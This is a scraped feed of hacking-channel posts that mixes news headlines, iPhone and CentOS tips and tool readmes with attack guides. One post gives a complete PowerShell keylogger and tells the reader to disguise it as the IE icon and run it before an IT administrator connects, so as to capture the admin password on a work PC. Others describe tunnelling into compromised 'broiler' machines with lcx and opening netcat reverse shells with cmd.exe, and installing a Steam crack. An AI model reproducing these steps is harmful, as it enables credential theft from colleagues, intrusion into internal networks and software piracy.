New Samsung Vulnerability allows attackers to bypass authentication for a locked Gallery.
#Vulnerabilities

Many unpatched Vulnerabilities in android LG devices.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to check for unnecessary subscriptions on iPhone?
#FastTips

1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.

2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.

3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.

Settings: Apple ID -> Subscriptions

Profile icon (in Today, Games, Apps and Arcade) -> subscriptions on the app Store

4) Settings (left), App Store (center), TV (right)

Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".

5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Tech giants face more investigations, Apple’s app store can’t stand alone.
#international

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⚙️How to get an admin password on a work PC in an Active Directory domain?

A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.

B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.


c) Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

🦑Start-KeyLogger

Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑the content that sniffer cares about can be divided into the following categories:

1) Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may cause the intruder to work out your algorithm while eating skewers at home.

2) Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent on the Internet.

3) keeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.

4) Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection. This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a later article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the problem will be much bigger in the future. (For advanced hackers, I think this is the only reason to use sniffers)

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Real Methode :
InfoZip UnZip 6.00 / 6.1c22 Buer Overow

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 CentOS Server Security Tips :

A) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.

B) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.

# find / -path / proc -prune -o -type f \ (-perm -4000 -o -perm -2000 \) -exec ls -l {} \;
To clear the setuid bit, run the following command:

# chmod us / path / to / binary_file
To clear the setgid bit, run the following command:

# chmod gs / path / to / binary_file
22. Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.

C) Run the below find command to list files or directories without users and groups.

# find / -nouser -o -nogroup -exec ls -l {} \;

D) List of files available for recording
Keeping a writable file on the system can be dangerous because anyone can change it.

Run the command below to display writable files other than symbolic links, which are always writable to everyone.

# find / -path / proc -prune -o -perm -2! -type l –ls

Create strong passwords
Create a password that is at least eight characters long.

Password must contain numbers, special characters and capital letters.

Use pwmake to generate a 128-bit password from / dev / urandom.

# pwmake 128

E) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:

password required pam_pwquality.so retry = 3
By adding this line, you are entering a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.

To force users to use a password of at least 8 characters, including all character classes, sequential character checking, add the following lines to /etc/security/pwquality.conf:

minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
How to Apply Strong User Password Policy in Ubuntu / Debian

F) Use password aging
The chage command can be used to control the age of a user's password.

To set the age of a user's password to 45 days, use the following command:

# chage -M 45 username
To disable password expiration use the command:

# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username

G) Blocking accounts
User accounts can be locked out by running passwd or usermod command:

# passwd -l username
# usermod -L username


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Alot of paid hacking book/ free on github!

https://github.com/yeahhub/Hacking-Security-Ebooks

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑OTP BYPASS :
Vulnerable OTP Application created using PHP & Google OTP/Updated!

You will need
1. Web Server (Apache recommended)
2. PHP 7 and above
3. Mysql or MariaDB

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) get https://github.com/mddanish/Vulnerable-OTP-Application

2) A step by step series of examples that tell you have to get the application running

After installing Apache, PHP 7 and MariaDB, which I think that you know how to install, or else google about it.

3) Setting up Application database.

Run SQL File vuln_otp.sql against MariaDB to create necessary Database, Table and Columns

4) Adding Database details to application

Edit config > db_connection.php and details of Database connections details (Hostname, Username, Password, Database Name)

5) Open the Application in browser and have fun.

Running the tests
You can use Burp suite or Browser web developer mode to bypass OTP login. Remember to Register a test user before Bypassing it, and use Google Authenticator for OTP


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .

A) For example, if we want to pass to the localhost / headers.php page a header named “ undercode ” with the value “ Hello! How are you? ", Then just run the following command:

curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.

B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:

sudo systemctl start apache2.service

C) If you have Arch Linux / BlackArch, then to start the web server run:

sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:

sudo gedit /var/www/html/headers.php

D) On Arch Linux / BlackArch:

sudo gedit /srv/http/headers.php
And copy the following into it:

<?php

$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}

E) That is, the script simply outputs the value of the Hackware header (if received).

If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.

F) Let's run the command already discussed above, in which we pass the undercode header:

curl -H 'undercode: Hello! How are you?' localhost/headers.php

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):

A) Let's first explain in detail the LXC forwarding tools and usage methods:

lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.

usage:

For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.

B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port: 51 ……
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port: 51 ……
[+] Accept a Client on port 55 from 222.221.221.22 ……
[+] Waiting another Client on port:3389….
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers

C) The following is a supplement from other netizens:

Native: lcx -listen 2222 3333

2222 is the forwarding port, and 3333 is any unoccupied port of the machine

Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389

119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port

3389 format when connected 127.0.0.1:3333

D) Intranet forwarding gesture

1. Use of lcx

1. Execute on broiler: lcx.exe –slave public network ip + port broiler ip + port

For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389

It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network

2. Execute Lcx.exe –listen 10000 10001 on the public IP machine

For example: Lcx.exe –listen 10001 10000

It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.

At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.

E) Two, nc rebound cmdshell

1. Open the broiler agent to execute cmdshell

Execute nc -l -p 2333 -t -e cmd.exe on the broiler

This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode

Execute nc -nvv broiler ip 2333 on your own public network server

2. Reverse proxy execute cmdshell

Run nc -l -p 2333 on the public network server

It means to monitor the local port 2333 and log in to other computers on the stage

Execute nc -t -e cmd.exe on the broiler, public network server ip 2333

It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

This script should be used only for fair purposes like making your own backup copies of games you own on your account.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/ZeDoCaixao/activate

2) Copy latest ACTiVATED crack .so-files to $HOME/.local/share/activate/x86/libsteam_api.so and $HOME/.local/share/activate/x86_64/libsteam_api.so. Copy script file (activate) anywhere in your $PATH, e.g. /usr/local/bin.

3) Go to game directory and enter activate. The script may ask for AppID if it can't find it. That's it.

cd ~/Games/SuperSteamGame
activate

4) It will replace libsteam_api.so files with ACTiVATED crack (of right architecture), detect a version of Steam interfaces and fill activated.ini files with right interfaces section.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⬛️ GoScan: interactive network scanner:

GoScan: an interactive network scanner client
GoScan Network Scanner is especially suitable for unstable environments such as: unstable and unreliable network connection, no available connections, etc.).

It uses a SQLite database to run scans, monitor and maintain health.

In addition, the scan runs in the background (disconnected from the main thread), so even if the connection to the machine running GoScan is lost, the results can be downloaded asynchronously.

Features:
Interactive network scanner with autocomplete,
Suitable for everyday and professional tasks,
Capable of host detection, port scans and service enumeration (integrates many tools such as: EyeWitness, Hydra, nikto, etc.)
Scanning is performed in the background, in case of connection loss, you can download the results asynchronously (there is no need to restart the process, data can be imported at different stages),
Supports all major stages of network enumeration,
and much more.
External Integrations [Service Support]
ARP: nmap
DNS: nmap, dnsrecon, dnsenum, host
FINGER: nmap, finger-user-enum
FTP: nmap, ftp-user-enum, hydra [AGGRESIVE]
HTTP: nmap, nikto, dirb, EyeWitness, SQLmap, fimap
RDP: nmap, EyeWitness
SMB: nmap, enum4linux, nbtscan, samrdump
SMTP: nmap, smtp-user-enum
SNMP: nmap, snmpcheck, onesixtyone, snmpwalk
SSH: hydra [AGGRESIVE]
SQL: nmap
VNC: EyeWitnes

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Building from source

Clone the repo: If you want to create a multiplatform binary, run:

$ git clone https://github.com/marco-lancini/goscan.git

2) Change to the GoScan directory and build it:

$ cd goscan / goscan /
$ make setup
$ make build

3) If you want to create a multi-platform binary, run:

$ make cross

🦑Installing the binary
This is the recommended installation method.

1) $ wget https://github.com/marcolancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip $ unzip goscan_2.3_linux_amd64.zip
Then put the executable in PATH:

2) $ chmod + x goscan

3) $ sudo mv ./goscan / usr / local / bin / goscan

4) choose option via numbers
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁